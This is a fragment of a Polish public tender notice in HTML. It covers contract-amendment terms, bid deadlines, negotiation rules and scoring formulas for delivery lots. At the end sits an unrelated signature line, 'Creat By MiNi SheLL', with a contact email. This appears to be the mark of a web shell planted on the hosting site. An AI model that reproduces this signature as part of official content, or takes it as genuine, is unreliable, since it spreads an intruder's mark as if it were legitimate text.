sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian modyfikujących ogólny charakter umowy oraz wprowadzania do umowy zmian istotnych, za które uważa się zmiany określone w art. 454 ust 2 ustawy Prawo zamówień publicznych.<br/>2.	Dopuszcza się zmiany umowy w zakresie, o którym mowa w art. 455 ust.1 pkt 2-4 i ust. 2 ustawy Prawo zamówień publicznych.<br/>3.	Zgodnie z art. 455 ust 1 pkt 1 ustawy Prawo zamówień publicznych strony przewidują możliwość zmian umowy w następujących przypadkach:<br/>1)	zmiany wynagrodzenia Wykonawcy (w tym cen jednostkowych) brutto, w przypadku:<br/>a)	zmiany przepisów obowiązujących dot. podatku VAT, <br/>b)	zmiany cen jednostkowych określonego produktu w sytuacji zmian cen na rynku. Niniejsza zmiana może nastąpić nie częściej niż raz na kwartał i w wysokości nie wyższej niż o wskaźnik zmiany cen towarów i usług konsumpcyjnych za poprzedni kwartał publikowany w Monitorze Polskim (tzw. klauzula waloryzacyjna). W takim przypadku ceny zostaną zmienione z pierwszym dniem miesiąca następującego po miesiącu, <br/>w którym złożono pismo wnioskujące o zmianę;<br/>2)	zmiany nazwy produktu (producenta) pod warunkiem zaoferowania produktów nie gorszych jakościowo od dotychczas dostarczanych przy jednoczesnym zachowaniu dotychczasowych lub niższych cen jednostkowych. Niniejsza zmiana może nastąpić w przypadku :<br/>a)	zaprzestania produkcji danego asortymentu przez producenta,<br/>b)	zmiany gramatury danej pozycji asortymentowej przez producenta produktu,<br/>c)	niedostępności produktu na rynku powyżej 14 dni kalendarzowych,<br/>3)	zmiany miejsca dostawy, w przypadku zmian organizacyjnych u Zamawiającego; <br/>4)	zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu dostawy bądź wprowadzenie nowego podwykonawcy, <br/>5)	zmiany postanowień umowy, których konieczność wprowadzenia jest wynikiem zmian obowiązującego prawa bądź działań organów państwowych, samorządowych, sądowych lub administracyjnych,<br/>6)	zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie, <br/>7)	zmiany postanowień umowny w uzasadnionych przypadkach, innych niż wyżej opisanych, gdy zachodzi konieczność ich wprowadzenia z powodu okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.<br/>4.	Maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w całym okresie obowiązywania niniejszej Umowy wynosi 15 % wartości brutto wynagrodzenia określonego w niniejszej Umowie z tytułu jej realizacji.<br/>5.	Dokonanie zmiany umowy wymaga uprzedniego złożenia na piśmie drugiej Stronie wniosku wykazującego zasadność wprowadzenia zmian (tj. wykazania, że zaistniała zmiana ma bezpośredni wpływ na koszty wykonania Umowy oraz określić stopień,w jakim wpłynie ona na wysokość wynagrodzenia) i zgody Stron na jej dokonanie. <br/><br/>Wniosek, o który mowa powyżej winien zawierać w szczególności: <br/>1)	propozycję (zakres) zmiany; <br/>2)	opis okoliczności faktycznych uprawniających do dokonania zmiany;<br/>3)	podstawę dokonania zmiany z niniejszej umowy;<br/>4)	informację lub dowody potwierdzające, że zostały spełnione okoliczności uzasadniające dokonanie zmiany.<br/>6.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku wykazującego zasadność wprowadzenia zmian i zgody stron na jej dokonanie.<br/>7.	Wszelkie zmiany umowy wymagają – pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu.<br/>8.	Uprawnienie żądania zmiany wynagrodzenia przysługuje zarówno Wykonawcy, jak i Zamawiającemu. W przypadku obniżenia cen lub kosztu w stosunku do cen lub kosztu przyjętego w celu ustalenia wynagrodzenia zawartego w ofercie, powyższe zapisy stosuje się odpowiednio do Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zostanie wykluczony z postępowania , jeżeli zajdą okoliczności określone w art. 108 ust. 1 ustawy Prawo Zamówień Publicznych lub art. 7 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz.U. poz. 835 ). .

Creat By MiNi SheLL
Email: jattceo@gmail.com